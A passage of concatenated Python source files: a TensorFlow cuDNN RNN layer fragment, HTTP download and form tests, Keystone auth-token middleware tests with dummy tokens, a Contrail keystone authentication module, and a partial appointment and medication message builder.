name="%s_saveable" % self.trainable_variables[0].name.split(":")[0])
self._saveable._add_checkpointable_dependencies( # pylint: disable=protected-access
checkpointable=self, dtype=self._plain_dtype)
ops.add_to_collection(ops.GraphKeys.SAVEABLE_OBJECTS, self._saveable)
class CudnnLSTM(_CudnnRNN):
"""Cudnn implementation of LSTM layer."""
_rnn_mode = CUDNN_LSTM
_num_params_per_layer = CUDNN_LSTM_PARAMS_PER_LAYER
_saveable_cls = cudnn_rnn_ops.CudnnLSTMSaveable
def state_shape(self, batch_size):
"""Shape of Cudnn LSTM states.
Shape is a 2-element tuple. Each is
[num_layers * num_dirs, batch_size, num_units]
Args:
batch_size: an int
Returns:
a tuple of python arrays.
"""
return ([self.num_layers * self.num_dirs, batch_size, self.num_units],
[self.num_layers * self.num_dirs, batch_size, self.num_units])
@property
def _gather_saveables_for_checkpoint(self):
if self._direction == CUDNN_RNN_UNIDIRECTION:
# Skip one inheritance level to avoid NotImplementedError.
return super(_CudnnRNN, self)._gather_saveables_for_checkpoint
else:
raise NotImplementedError(
"Object-based saving does not currently support bidirectional LSTM "
"cells. File a feature request if this limitation bothers you.")
class _CudnnRNNNoInputC(_CudnnRNN):
"""Abstract simple CudnnRNN layer without input_c."""
def state_shape(self, batch_size):
"""Shape of the state of Cudnn RNN cells w/o. input_c.
Shape is a 1-element tuple,
[num_layers * num_dirs, batch_size, num_units]
Args:
batch_size: an int
Returns:
a tuple of python arrays.
"""
return [self.num_layers * self.num_dirs, batch_size, self.num_units],
class CudnnGRU(_CudnnRNNNoInputC):
"""Cudnn implementation of the GRU layer."""
_rnn_mode = CUDNN_GRU
_num_params_per_layer = CUDNN_GRU_PARAMS_PER_LAYER
_saveable_cls = cudnn_rnn_ops.CudnnGRUSaveable
class CudnnRNNTanh(_CudnnRNNNoInputC):
"""Cudnn implementation of the RNN-tanh layer."""
_rnn_mode = CUDNN_RNN_TANH
_num_params_per_layer = CUDNN_RNN_TANH_PARAMS_PER_LAYER
_saveable_cls = cudnn_rnn_ops.CudnnRNNTanhSaveable
class CudnnRNNRelu(_CudnnRNNNoInputC):
"""Cudnn implementation of the RNN-relu layer."""
_rnn_mode = CUDNN_RNN_RELU
_num_params_per_layer = CUDNN_RNN_RELU_PARAMS_PER_LAYER
_saveable_cls = cudnn_rnn_ops.CudnnRNNReluSaveable
|
|
import unittest
from tests.availability import lxml_available, requests_available
import contextlib
import filecmp
import pathlib
import socketserver
import sys
import tempfile
from concurrent import futures
if requests_available:
from garage.http import clients
from garage.http import utils
from tests.http.mocks import *
from tests.http.server import *
@unittest.skipUnless(requests_available, 'requests unavailable')
class DownloadTest(unittest.TestCase):
data_dirpath = pathlib.Path(__file__).with_name('data')
if not data_dirpath.is_absolute():
data_dirpath = pathlib.Path.cwd() / data_dirpath
def setUp(self):
# XXX: Work around TIME_WAIT state of connected sockets.
socketserver.TCPServer.allow_reuse_address = True
def tearDown(self):
socketserver.TCPServer.allow_reuse_address = False
def prepare(self, stack):
stack.enter_context(suppress_stderr())
stack.enter_context(change_dir(self.data_dirpath))
stack.enter_context(start_server())
self.executor = stack.enter_context(futures.ThreadPoolExecutor(1))
self.root_dirpath = pathlib.Path(
stack.enter_context(tempfile.TemporaryDirectory()))
print('data_dirpath', self.data_dirpath, file=sys.stderr)
print('root_dirpath', self.root_dirpath, file=sys.stderr)
def test_download(self):
relpath_to_requests = {
'file1': [
'http://localhost:8000/file1-not',
'http://localhost:8000/file1-still-not',
'http://localhost:8000/file1',
'http://localhost:8000/file1-also-not',
],
'path/to/file2-alias': [
'http://localhost:8000/file2',
],
}
with contextlib.ExitStack() as stack:
self.prepare(stack)
utils.download(
client=clients.Client(),
executor=self.executor,
output_dirpath=(self.root_dirpath / 'test'),
relpath_to_requests=relpath_to_requests,
)
self.assertTrue(self.root_dirpath.is_dir())
self.assertFileEqual(
self.data_dirpath / 'file1',
self.root_dirpath / 'test' / 'file1',
)
self.assertFileEqual(
self.data_dirpath / 'file2',
self.root_dirpath / 'test' / 'path/to/file2-alias',
)
paths = [
str(path.relative_to(self.root_dirpath))
for path in sorted(self.root_dirpath.glob('**/*'))
]
self.assertListEqual(
[
'test',
'test/file1',
'test/path',
'test/path/to',
'test/path/to/file2-alias',
],
paths,
)
def test_downloader(self):
"""Test each step that download() takes."""
relpath_to_requests = {
'file1': ['http://localhost:8000/file1'],
'file2': ['http://localhost:8000/file2'],
}
with contextlib.ExitStack() as stack:
self.prepare(stack)
client = clients.Client()
output_dirpath = self.root_dirpath / 'test'
dler = utils._Downloader(
client=client,
executor=self.executor,
output_dirpath=output_dirpath,
relpath_to_requests=relpath_to_requests,
strict=True,
chunk_size=10240)
### Test _Downloader.prepare()
# prepare() skips existing dir.
output_dirpath.mkdir(parents=True)
self.assertFalse(dler.prepare())
output_dirpath.rmdir()
# prepare() errs on non-dir.
output_dirpath.touch()
with self.assertRaises(utils.DownloadError):
dler.prepare()
output_dirpath.unlink()
# prepare() errs on non-dir.
tmp_dirpath = output_dirpath.with_name(
output_dirpath.name + '.part')
tmp_dirpath.touch()
with self.assertRaises(utils.DownloadError):
dler.prepare()
tmp_dirpath.unlink()
self.assertTrue(dler.prepare())
### Test _Downloader.download()
# download() skips existing file.
file1_path = tmp_dirpath / 'file1'
file1_path.touch()
dler.download(tmp_dirpath)
with file1_path.open() as file1:
self.assertEqual('', file1.read())
self.assertFileNotEqual(
self.data_dirpath / 'file1',
tmp_dirpath / 'file1',
)
self.assertFileEqual(
self.data_dirpath / 'file2',
tmp_dirpath / 'file2',
)
### Test _Downloader.check()
file3_path = tmp_dirpath / 'path/to/file3'
file3_path.parent.mkdir(parents=True)
file3_path.touch()
dler.strict = False
dler.check(tmp_dirpath)
self.assertTrue(file3_path.exists())
self.assertTrue(file3_path.parent.exists())
self.assertTrue(file3_path.parent.parent.exists())
# check() removes extra files when strict is True.
dler.strict = True
dler.check(tmp_dirpath)
self.assertFalse(file3_path.exists())
self.assertFalse(file3_path.parent.exists())
self.assertFalse(file3_path.parent.parent.exists())
paths = [
str(path.relative_to(self.root_dirpath))
for path in sorted(self.root_dirpath.glob('**/*'))
]
self.assertListEqual(
['test.part', 'test.part/file1', 'test.part/file2'], paths
)
# check() errs on missing files.
file1_path.unlink()
with self.assertRaises(utils.DownloadError):
dler.check(tmp_dirpath)
def assertFileEqual(self, expect, actual):
self.assertTrue(self.compare_file(expect, actual))
def assertFileNotEqual(self, expect, actual):
self.assertFalse(self.compare_file(expect, actual))
def compare_file(self, expect, actual):
expect = pathlib.Path(expect)
actual = pathlib.Path(actual)
self.assertTrue(expect.is_file())
self.assertTrue(actual.is_file())
return filecmp.cmp(str(expect), str(actual), shallow=False)
@unittest.skipUnless(requests_available, 'requests unavailable')
class FormTest(unittest.TestCase):
@unittest.skipUnless(lxml_available, 'lxml unavailable')
def test_form(self):
req_to_rep = {
('GET', 'http://uri_1/'): (
200, b'<form action="http://uri_1"></form>'
),
('POST', 'http://uri_1/'): (200, 'hello world'),
('GET', 'http://uri_2/'): (200, b'<form></form><form></form>'),
('GET', 'http://uri_3/'): (
200, b'''<form action="http://uri_3">
<input name="k1" value="v1"/>
<input name="k2" value="other_v2"/>
</form>
'''
),
('POST', 'http://uri_3/'): (200, 'form filled'),
}
session = MockSession(req_to_rep)
client = clients.Client(_session=session, _sleep=fake_sleep)
rep = utils.form(client, 'http://uri_1')
self.assertEqual('hello world', rep.content)
with self.assertRaisesRegex(ValueError, 'require one form'):
rep = utils.form(client, 'http://uri_2')
session._logs.clear()
rep = utils.form(client, 'http://uri_3', form_data={'k2': 'v2'})
self.assertEqual('form filled', rep.content)
self.assertEqual(2, len(session._logs))
self.assertEqual('GET', session._logs[0].method)
self.assertEqual('http://uri_3/', session._logs[0].url)
self.assertEqual('POST', session._logs[1].method)
self.assertEqual('http://uri_3/', session._logs[1].url)
self.assertListEqual(
['k1=v1', 'k2=v2'], sorted(session._logs[1].body.split('&')))
if __name__ == '__main__':
unittest.main()
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import webob
import datetime
import iso8601
from keystone.middleware import auth_token
from keystone import test
# JSON responses keyed by token ID
TOKEN_RESPONSES = {
'valid-token': {
'access': {
'token': {
'id': 'valid-token',
'tenant': {
'id': 'tenant_id1',
'name': 'tenant_name1',
},
},
'user': {
'id': 'user_id1',
'name': 'user_name1',
'roles': [
{'name': 'role1'},
{'name': 'role2'},
],
},
},
},
'default-tenant-token': {
'access': {
'token': {
'id': 'default-tenant-token',
},
'user': {
'id': 'user_id1',
'name': 'user_name1',
'tenantId': 'tenant_id1',
'tenantName': 'tenant_name1',
'roles': [
{'name': 'role1'},
{'name': 'role2'},
],
},
},
},
'valid-diablo-token': {
'access': {
'token': {
'id': 'valid-diablo-token',
'tenantId': 'tenant_id1',
},
'user': {
'id': 'user_id1',
'name': 'user_name1',
'roles': [
{'name': 'role1'},
{'name': 'role2'},
],
},
},
},
'unscoped-token': {
'access': {
'token': {
'id': 'unscoped-token',
},
'user': {
'id': 'user_id1',
'name': 'user_name1',
'roles': [
{'name': 'role1'},
{'name': 'role2'},
],
},
},
}
}
class FakeMemcache(object):
def __init__(self):
self.set_key = None
self.set_value = None
self.token_expiration = None
def get(self, key):
data = TOKEN_RESPONSES['valid-token'].copy()
if not data or key != "tokens/%s" % (data['access']['token']['id']):
return
if not self.token_expiration:
dt = datetime.datetime.now() + datetime.timedelta(minutes=5)
self.token_expiration = dt.strftime("%s")
dt = datetime.datetime.now() + datetime.timedelta(hours=24)
ks_expires = dt.isoformat()
data['access']['token']['expires'] = ks_expires
return (data, str(self.token_expiration))
def set(self, key, value, time=None):
self.set_value = value
self.set_key = key
class FakeHTTPResponse(object):
def __init__(self, status, body):
self.status = status
self.body = body
def read(self):
return self.body
class FakeHTTPConnection(object):
def __init__(self, *args):
pass
def request(self, method, path, **kwargs):
"""Fakes out several http responses.
If a POST request is made, we assume the calling code is trying
to get a new admin token.
If a GET request is made to validate a token, return success
if the token is 'token1'. If a different token is provided, return
a 404, indicating an unknown (therefore unauthorized) token.
"""
if method == 'POST':
status = 200
body = json.dumps({
'access': {
'token': {'id': 'admin_token2'},
},
})
else:
token_id = path.rsplit('/', 1)[1]
if token_id in TOKEN_RESPONSES.keys():
status = 200
body = json.dumps(TOKEN_RESPONSES[token_id])
else:
status = 404
body = str()
self.resp = FakeHTTPResponse(status, body)
def getresponse(self):
return self.resp
def close(self):
pass
class FakeApp(object):
"""This represents a WSGI app protected by the auth_token middleware."""
def __init__(self, expected_env=None):
expected_env = expected_env or {}
self.expected_env = {
'HTTP_X_IDENTITY_STATUS': 'Confirmed',
'HTTP_X_TENANT_ID': 'tenant_id1',
'HTTP_X_TENANT_NAME': 'tenant_name1',
'HTTP_X_USER_ID': 'user_id1',
'HTTP_X_USER_NAME': 'user_name1',
'HTTP_X_ROLES': 'role1,role2',
'HTTP_X_USER': 'user_name1', # deprecated (diablo-compat)
'HTTP_X_TENANT': 'tenant_name1', # deprecated (diablo-compat)
'HTTP_X_ROLE': 'role1,role2', # deprecated (diablo-compat)
}
self.expected_env.update(expected_env)
def __call__(self, env, start_response):
for k, v in self.expected_env.items():
assert env[k] == v, '%s != %s' % (env[k], v)
resp = webob.Response()
resp.body = 'SUCCESS'
return resp(env, start_response)
class BaseAuthTokenMiddlewareTest(test.TestCase):
def setUp(self, expected_env=None):
expected_env = expected_env or {}
conf = {
'admin_token': 'admin_token1',
'auth_host': 'keystone.example.com',
'auth_port': 1234,
}
self.middleware = auth_token.AuthProtocol(FakeApp(expected_env), conf)
self.middleware.http_client_class = FakeHTTPConnection
self.middleware._iso8601 = iso8601
self.response_status = None
self.response_headers = None
super(BaseAuthTokenMiddlewareTest, self).setUp()
def start_fake_response(self, status, headers):
self.response_status = int(status.split(' ', 1)[0])
self.response_headers = dict(headers)
class DiabloAuthTokenMiddlewareTest(BaseAuthTokenMiddlewareTest):
"""Auth Token middleware should understand Diablo keystone responses."""
def setUp(self):
# pre-diablo only had Tenant ID, which was also the Name
expected_env = {
'HTTP_X_TENANT_ID': 'tenant_id1',
'HTTP_X_TENANT_NAME': 'tenant_id1',
'HTTP_X_TENANT': 'tenant_id1', # now deprecated (diablo-compat)
}
super(DiabloAuthTokenMiddlewareTest, self).setUp(expected_env)
def test_diablo_response(self):
req = webob.Request.blank('/')
req.headers['X-Auth-Token'] = 'valid-diablo-token'
body = self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 200)
self.assertEqual(body, ['SUCCESS'])
class AuthTokenMiddlewareTest(BaseAuthTokenMiddlewareTest):
def test_valid_request(self):
req = webob.Request.blank('/')
req.headers['X-Auth-Token'] = 'valid-token'
body = self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 200)
self.assertEqual(body, ['SUCCESS'])
def test_default_tenant_token(self):
"""Unscoped requests with a default tenant should "auto-scope."
The implied scope is the user's tenant ID.
"""
req = webob.Request.blank('/')
req.headers['X-Auth-Token'] = 'default-tenant-token'
body = self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 200)
self.assertEqual(body, ['SUCCESS'])
def test_unscoped_token(self):
"""Unscoped requests with no default tenant ID should be rejected."""
req = webob.Request.blank('/')
req.headers['X-Auth-Token'] = 'unscoped-token'
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 401)
self.assertEqual(self.response_headers['WWW-Authenticate'],
'Keystone uri=\'https://keystone.example.com:1234\'')
def test_request_invalid_token(self):
req = webob.Request.blank('/')
req.headers['X-Auth-Token'] = 'invalid-token'
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 401)
self.assertEqual(self.response_headers['WWW-Authenticate'],
'Keystone uri=\'https://keystone.example.com:1234\'')
def test_request_no_token(self):
req = webob.Request.blank('/')
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 401)
self.assertEqual(self.response_headers['WWW-Authenticate'],
'Keystone uri=\'https://keystone.example.com:1234\'')
def test_request_blank_token(self):
req = webob.Request.blank('/')
req.headers['X-Auth-Token'] = ''
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 401)
self.assertEqual(self.response_headers['WWW-Authenticate'],
'Keystone uri=\'https://keystone.example.com:1234\'')
def test_memcache(self):
req = webob.Request.blank('/')
req.headers['X-Auth-Token'] = 'valid-token'
self.middleware._cache = FakeMemcache()
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.middleware._cache.set_value, None)
def test_memcache_set_invalid(self):
req = webob.Request.blank('/')
req.headers['X-Auth-Token'] = 'invalid-token'
self.middleware._cache = FakeMemcache()
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.middleware._cache.set_value, "invalid")
def test_memcache_set_expired(self):
req = webob.Request.blank('/')
req.headers['X-Auth-Token'] = 'valid-token'
self.middleware._cache = FakeMemcache()
expired = datetime.datetime.now() - datetime.timedelta(minutes=1)
self.middleware._cache.token_expiration = float(expired.strftime("%s"))
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(len(self.middleware._cache.set_value), 2)
if __name__ == '__main__':
import unittest
unittest.main()
|
|
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
#
# This file contains authentication/authorization functionality for VNC-CFG
# subsystem. It also currently contains keystone adaptation which can in
# future by moved to vnc_auth_keystone.py
#
import gevent
from gevent import monkey
monkey.patch_all()
import ConfigParser
import bottle
import time
import base64
import re
try:
from keystoneclient.middleware import auth_token
except ImportError:
try:
from keystonemiddleware import auth_token
except ImportError:
pass
from pysandesh.gen_py.sandesh.ttypes import SandeshLevel
from vnc_bottle import get_bottle_server
from cfgm_common import utils as cfgmutils
from cfgm_common import vnc_greenlets
from context import get_request, get_context, set_context, use_context
from context import ApiContext, ApiInternalRequest
#keystone SSL cert bundle
_DEFAULT_KS_CERT_BUNDLE="/tmp/keystonecertbundle.pem"
_DEFAULT_KS_VERSION = "v2.0"
# Open port for access to API server for trouble shooting
class LocalAuth(object):
def __init__(self, app, conf_info):
self._http_host = 'localhost'
self._http_port = conf_info['admin_port']
self._http_app = bottle.Bottle()
self._http_app.merge(app.routes)
self._http_app.config.local_auth = True
self._http_app.error_handler = app.error_handler
self._conf_info = conf_info
# 2 decorators below due to change in api between bottle 0.11.6
# (which insists on global app) vs later (which need on specific
# app)
@self._http_app.hook('before_request')
@bottle.hook('before_request')
def local_auth_check(*args, **kwargs):
if bottle.request.app != self._http_app:
return
# expect header to have something like 'Basic YWJjOmRlZg=='
auth_hdr_val = bottle.request.environ.get('HTTP_AUTHORIZATION')
if not auth_hdr_val:
bottle.abort(401, 'HTTP_AUTHORIZATION header missing')
try:
auth_type, user_passwd = auth_hdr_val.split()
except Exception as e:
bottle.abort(401, 'Auth Exception: %s' %(str(e)))
enc_user_passwd = auth_hdr_val.split()[1]
user_passwd = base64.b64decode(enc_user_passwd)
user, passwd = user_passwd.split(':')
admin_user = self._conf_info.get('admin_user',
self._conf_info.get('username'))
admin_password = self._conf_info.get('admin_password',
self._conf_info.get('password'))
if (not admin_user == user or not admin_password == passwd):
bottle.abort(401, 'Authentication check failed')
# Add admin role to the request
bottle.request.environ['HTTP_X_ROLE'] = 'admin'
# end __init__
def start_http_server(self):
self._http_app.run(
host=self._http_host, port=self._http_port,
server=get_bottle_server(self._conf_info.get('max_requests')))
# end start_http_server
# end class LocalAuth
# Pre-auth filter
class AuthPreKeystone(object):
def __init__(self, app, conf, server_mgr):
self.app = app
self.conf = conf
self.server_mgr = server_mgr
def path_in_white_list(self, path):
for pattern in self.server_mgr.white_list:
if re.search(pattern, path):
return True
return False
@use_context
def __call__(self, env, start_response):
if self.path_in_white_list(env['PATH_INFO']):
# permit access to white list without requiring a token
env['HTTP_X_ROLE'] = ''
app = self.server_mgr.api_bottle
elif self.server_mgr.is_auth_needed():
app = self.app
else:
app = self.server_mgr.api_bottle
get_context().set_proc_time('PRE_KEYSTONE_REQ')
return app(env, start_response)
# Post-auth filter. Normalize user/role supplied by quantum plugin for
# consumption by Perms
class AuthPostKeystone(object):
def __init__(self, app, conf):
self.app = app
self.conf = conf
def __call__(self, env, start_response):
get_context().set_proc_time('POST_KEYSTONE_REQ')
# if rbac is set, skip old admin based MT
if self.conf['auth_svc']._mt_rbac:
return self.app(env, start_response)
# only allow admin access when MT is on
roles = []
if 'HTTP_X_ROLE' in env:
roles = env['HTTP_X_ROLE'].split(',')
if not 'admin' in [x.lower() for x in roles]:
start_response('403 Permission Denied',
[('Content-type', 'text/plain')])
return ['403 Permission Denied']
return self.app(env, start_response)
class AuthServiceKeystone(object):
def __init__(self, server_mgr, args):
self.args = args
_kscertbundle=''
if args.auth_protocol == 'https' and args.cafile:
certs=[args.cafile]
if args.keyfile and args.certfile:
certs=[args.certfile, args.keyfile, args.cafile]
_kscertbundle=cfgmutils.getCertKeyCaBundle(_DEFAULT_KS_CERT_BUNDLE,certs)
self._conf_info = {
'admin_port': args.admin_port,
'max_requests': args.max_requests,
'region_name': args.region_name,
'insecure': args.insecure,
}
if args.auth_url:
auth_url = args.auth_url
else:
auth_url = '%s://%s:%s/%s' % (
args.auth_protocol, args.auth_host, args.auth_port,
_DEFAULT_KS_VERSION)
if 'v2.0' in auth_url.split('/'):
identity_uri = '%s://%s:%s' % (
args.auth_protocol, args.auth_host, args.auth_port)
self._conf_info.update({
'auth_host': args.auth_host,
'auth_port': args.auth_port,
'auth_protocol': args.auth_protocol,
'admin_user': args.admin_user,
'admin_password': args.admin_password,
'admin_tenant_name': args.admin_tenant_name,
'identity_uri': identity_uri})
else:
self._conf_info.update({
'auth_type': args.auth_type,
'auth_url': auth_url,
'username': args.admin_user,
'password': args.admin_password,
})
# Add user domain info
self._conf_info.update(**cfgmutils.get_user_domain_kwargs(args))
# Get project scope auth params
scope_kwargs = cfgmutils.get_project_scope_kwargs(args)
if not scope_kwargs:
# Default to domain scoped auth
scope_kwargs = cfgmutils.get_domain_scope_kwargs(args)
self._conf_info.update(**scope_kwargs)
if _kscertbundle:
self._conf_info['cafile'] = _kscertbundle
self._server_mgr = server_mgr
self._auth_method = args.auth
self._auth_middleware = None
self._mt_rbac = server_mgr.is_rbac_enabled()
self._auth_needed = server_mgr.is_auth_needed()
if not self._auth_method:
return
if self._auth_method != 'keystone':
raise UnknownAuthMethod()
# map keystone id to users. Needed for quantum plugin because contrail
# plugin doesn't have access to user token and ends up sending admin
# admin token along with user-id and role
self._ks_users = {}
# configure memcache if enabled
if self._auth_needed and 'memcache_servers' in args:
self._conf_info[
'memcached_servers'] = args.memcache_servers.split(',')
if 'token_cache_time' in args:
self._conf_info['token_cache_time'] = args.token_cache_time
self._user_auth_middleware = None
self._hdr_from_token_auth_middleware = None
# end __init__
def get_middleware_app(self):
if not self._auth_method:
return None
if not self._auth_needed:
return None
# keystone middleware is needed for fetching objects
app = AuthPostKeystone(self._server_mgr.api_bottle, {'auth_svc': self})
auth_middleware = auth_token.AuthProtocol(app, self._conf_info)
self._auth_middleware = auth_middleware
# open access for troubleshooting
admin_port = self._conf_info['admin_port']
self._local_auth_app = LocalAuth(self._server_mgr.api_bottle,
self._conf_info)
vnc_greenlets.VncGreenlet("VNC Auth Keystone",
self._local_auth_app.start_http_server)
app = AuthPreKeystone(auth_middleware, None, self._server_mgr)
return app
# end get_middleware_app
def verify_signed_token(self, user_token):
try:
return self._auth_middleware.verify_signed_token(user_token)
except:
# Retry verify after fetching the certs.
try:
self._auth_middleware.fetch_signing_cert()
self._auth_middleware.fetch_ca_cert()
return self._auth_middleware.verify_signed_token(user_token)
except:
return None
# end
# gets called from keystone middleware after token check
def token_valid(self, env, start_response):
status = env.get('HTTP_X_IDENTITY_STATUS')
token_info = env.get('keystone.token_info')
start_response('200 OK', [('Content-type', 'text/plain')])
return token_info if status != 'Invalid' else ''
def start_response(self, status, headers, exc_info=None):
pass
def validate_user_token(self):
if not self._user_auth_middleware:
# following config forces keystone middleware to always return the
# result back in HTTP_X_IDENTITY_STATUS env variable
conf_info = self._conf_info.copy()
conf_info['delay_auth_decision'] = True
self._user_auth_middleware = auth_token.AuthProtocol(
self.token_valid, conf_info)
if not self._user_auth_middleware:
return False, (403, " Permission denied")
request_attrs = {
'REQUEST_METHOD': get_request().route.method,
'bottle.app': get_request().environ['bottle.app'],
}
if 'HTTP_X_AUTH_TOKEN' in get_request().environ:
request_attrs['HTTP_X_AUTH_TOKEN'] =\
get_request().environ['HTTP_X_AUTH_TOKEN'].encode("ascii")
elif 'HTTP_X_USER_TOKEN' in get_request().environ:
request_attrs['HTTP_X_USER_TOKEN'] =\
get_request().environ['HTTP_X_USER_TOKEN'].encode("ascii")
else:
return False, (400, "User token needed for validation")
b_req = bottle.BaseRequest(request_attrs)
# get permissions in internal context
orig_context = get_context()
i_req = ApiInternalRequest(b_req.url, b_req.urlparts, b_req.environ,
b_req.headers, None, None)
set_context(ApiContext(internal_req=i_req))
try:
token_info = self._user_auth_middleware(
get_request().headers.environ, self.start_response)
finally:
set_context(orig_context)
return True, token_info
def get_auth_headers_from_token(self, request, token):
if not self._hdr_from_token_auth_middleware:
conf_info = self._conf_info.copy()
conf_info['delay_auth_decision'] = True
def token_to_headers(env, start_response):
start_response('200 OK', [('Content-type', 'text/plain')])
status = env.get('HTTP_X_IDENTITY_STATUS')
if status and status.lower() == 'invalid':
return {}
ret_headers_dict = {}
for hdr_name in ['HTTP_X_DOMAIN_ID', 'HTTP_X_PROJECT_ID',
'HTTP_X_PROJECT_NAME', 'HTTP_X_USER', 'HTTP_X_ROLE',
'HTTP_X_API_ROLE']:
hdr_val = env.get(hdr_name)
if hdr_val:
ret_headers_dict[hdr_name] = hdr_val
return ret_headers_dict
self._hdr_from_token_auth_middleware = auth_token.AuthProtocol(
token_to_headers, conf_info)
return self._hdr_from_token_auth_middleware(
request.headers.environ, self.start_response)
# end get_auth_headers_from_token
# end class AuthService
|
|
# import sqlite3
# import iso8601
import logging
import os
import requests
rootLogger = logging.getLogger(__name__)
pica_url = os.environ.get('pica_url')
def get_appointment_msg(msg_info,time_frame):
rootLogger.info('Getting Appointments')
'''
if not msg_info["Device ID"]: #test database
param = { 'db_name': 'devdb',
'table_name': 'appointment',
'time_frame': time_frame,
'user_id': 'user1'
}
'''
# else: #setup dict for sending to api
param = { 'db_name': 'appt',
'time_frame': time_frame,
'user_id': msg_info["Device ID"]
}
# [{'date': '2017-12-04T00:00:00.000Z', 'time': '12:00nn', 'service_type': 'Meal Service',
# 'assigned_careworker': '####'}]
#rootLogger.info(timeframe)
appointmentslist, status = get_info_from_PICA(param)
if status=='success':
if appointmentslist:
appointmentslist = [x for x in appointmentslist if x is not None] # handling weird occasional null output from pica
numappointments = len(appointmentslist)
appointment_msglist = []
if numappointments > 1:
appointment_msglist.append('You have, {}, events. '.format(numappointments))
else:
appointment_msglist.append('You have, 1, events. ')
prev_date = ''
prev_time = ''
for idx, appointment in enumerate(appointmentslist):
if appointment['service_type']=='Activities - indoor': #handle activities
if numappointments > 1:
appointment_msglist.append('. Activity, {}: . '.format(idx + 1))
# Midday meal (service type) will arrive at date/time and be provided by Careworker Name (appointed_person)
if appointment['name']:
appointment_msglist.append(appointment['name'])
if appointment['date'] and not prev_date == appointment['date']:
appointment_msglist.append('on ' + appointment['date'][
0:10] + ',') # poor implementation! to revisit once PICA figures out what they have
prev_date = appointment['date']
if appointment['time'] and not prev_time == appointment['time']:
prev_time = appointment['time']
if 'nn' in appointment['time']:
appointment_msglist.append(' at ' + appointment['time'][
0:2] + ' noon. ') # poor implementation! to revisit once PICA figures out what they have
else:
appointment_msglist.append(' at ' + appointment['time'] + '. ')
if appointment['appointed_person']:
appointment_msglist.append('and be provided by ' + appointment['appointed_person'] + '.')
elif appointment['location']=='home': # handle in-house appointment
# Midday meal (service type) will arrive at date/time and be provided by Careworker Name (appointed_person)
if numappointments > 1:
appointment_msglist.append('. Appointment, {}: . '.format(idx + 1))
if appointment['name']:
appointment_msglist.append(appointment['name'] + ' will arrive at')
if appointment['date'] and not prev_date == appointment['date']:
appointment_msglist.append(appointment['date'][0:10] + ',') #poor implementation! to revisit once PICA figures out what they have
prev_date = appointment['date']
if appointment['time'] and not prev_time == appointment['time']:
prev_time = appointment['time']
if 'nn' in appointment['time']:
appointment_msglist.append(appointment['time'][0:2]+' noon.') #poor implementation! to revisit once PICA figures out what they have
else:
appointment_msglist.append(appointment['time'] + '. ')
if appointment['appointed_person']:
appointment_msglist.append('and be provided by ' + appointment['appointed_person'] + '.')
else: # handle out-house appointment
# (service_type) on date/time, at (location)
if numappointments > 1:
appointment_msglist.append('. Appointment, {}: . '.format(idx + 1))
if appointment['name']:
appointment_msglist.append(appointment['name'])
if appointment['date'] and not prev_date == appointment['date']:
appointment_msglist.append('on ' + appointment['date'][0:10] + ',') #poor implementation! to revisit once PICA figures out what they have
prev_date = appointment['date']
if appointment['time'] and not prev_time == appointment['time']:
prev_time = appointment['time']
if 'nn' in appointment['time']:
appointment_msglist.append(appointment['time'][0:2]+' noon.') #poor implementation! to revisit once PICA figures out what they have
else:
appointment_msglist.append(appointment['time'] + '. ')
if appointment['location']:
appointment_msglist.append('at ' + appointment['location'] + '.')
appointment_msg = ', '.join(appointment_msglist)
else:
appointment_msg = 'You have no appointments.'
elif status == 'Connection Error':
#appointment_msg = "You have 1 appointment. Dental Checkup. On: Sat, 13 Jan 2018, 2:10 PM. With: Dr Chin at: TTSH. "
appointment_msg = "Sorry we are experiencing technical difficulties retrieving data. Please check back later."
rootLogger.error('PICA connection Error')
elif status == 'Connection Timeout':
#appointment_msg = "You have 1 appointment. Dental Checkup. On: Sat, 13 Jan 2018, 2:10 PM. With: Dr Chin at: TTSH. "
appointment_msg = "Sorry we are experiencing technical difficulties retrieving data. Please check back later."
rootLogger.error('PICA connection Timeout')
else:
appointment_msg = 'Error in Appointment function'
# appointment_msg='Your current schedules are {}'.format(appointment_msgstr)
rootLogger.info("Get Appointment complete")
rootLogger.debug(appointment_msg)
return appointment_msg, status
def get_medication_msg(msg_info,time_frame):
rootLogger.info('Getting Medication')
'''
if not msg_info["Device ID"]:
param = { 'db_name': 'devdb',
'table_name': 'medication',
'time_frame': time_frame,
'user_id': 'user1'
}
'''
#else:
param = { 'db_name': 'meds',
'time_frame': time_frame,
'user_id': msg_info["Device ID"]
}
medicationlist, status = get_info_from_PICA(param)
if status == 'success':
if medicationlist:
medicationlist = [x for x in medicationlist if x is not None] #handling weird occasional null output from pica
nummedication = len(medicationlist)
medication_msglist = []
if nummedication > 1:
medication_msglist.append('You have {} medications. '.format(nummedication))
else:
medication_msglist.append('You have 1 medication. ')
prev_date=''
prev_time = ''
for idx, medication in enumerate(medicationlist):
if nummedication > 1:
medication_msglist.append('. Medication {}:'.format(idx + 1) + '. ')
if medication['date'] and not prev_date == medication['date']: #group similar dates together
medication_msglist.append('On ' + medication['date'][0:10] + ',') #poor implementation! to revisit once PICA figures out what they have
prev_date = medication['date']
if medication['time'] and not prev_time == medication['time']: #group similar times together <- may have error if spans multiple days
prev_time = medication['time']
if 'nn' in medication['time']:
medication_msglist.append('at ' + medication['time'][0:2]+' noon') #poor implementation! to revisit once PICA figures out what they have
else:
medication_msglist.append('at ' + medication['time'])
if medication['medications']:
for med in medication['medications']:
medication_msglist.append(med + ', ')
medication_msg = ', '.join(medication_msglist)
else:
